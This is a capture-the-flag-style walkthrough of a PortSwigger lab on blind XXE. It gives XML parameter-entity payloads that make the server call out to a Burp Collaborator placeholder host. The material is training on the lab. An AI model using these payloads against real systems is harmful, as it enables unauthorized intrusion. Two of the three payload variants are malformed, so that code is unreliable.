Blind XXE with out-of-band interaction via XML parameter entities

Information

Hello guys, today in Blind XXE with out-of-band interaction via XML parameter entities we will solve the 4th lab of PortSwigger Web Security. As you know, we are exploring XML or XXE vulnerabilities in a series and solving their practical labs.

In today’s article, we will solve the lab named “Blind XXE with out-of-band interaction via XML parameter entities” in a step-by-step manner.

Lab Description Of Blind XXE with out-of-band interaction via XML parameter entities

In this lab, there is a “check stock” feature that accepts input through XML parsing. The problem here is that it does not display any unexpected values and blocks the request if it contains regular external entities. To solve this lab, we need to create an XML parser through a parameter entity, make a DNS lookup request, and check the result in Burp Suite Collaborator.

Lab Solution

First, access the lab. After accessing the lab, view any product. Once you view the product, you will find a stock check button there. Click on the stock check button and intercept it in Burp Suite.

1. <!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"%xxe;> ]>

Now, take the given external entity definition and insert it between the XML declaration and the stockCheck element, and forward the request.

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> %xxe; ]>

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN"> ]> %xxe;

I have used 3 payloads above, out of which one will definitely execute.

Now, we need to check Burp Collaborator to see if any DNS and HTTP requests have been received there or not.

As you can see, we have received requests in Burp Collaborator. Now, let’s check if our lab has been successfully solved or not.

We have successfully solved the lab on Blind XXE with out-of-band interaction via XML parameter entities.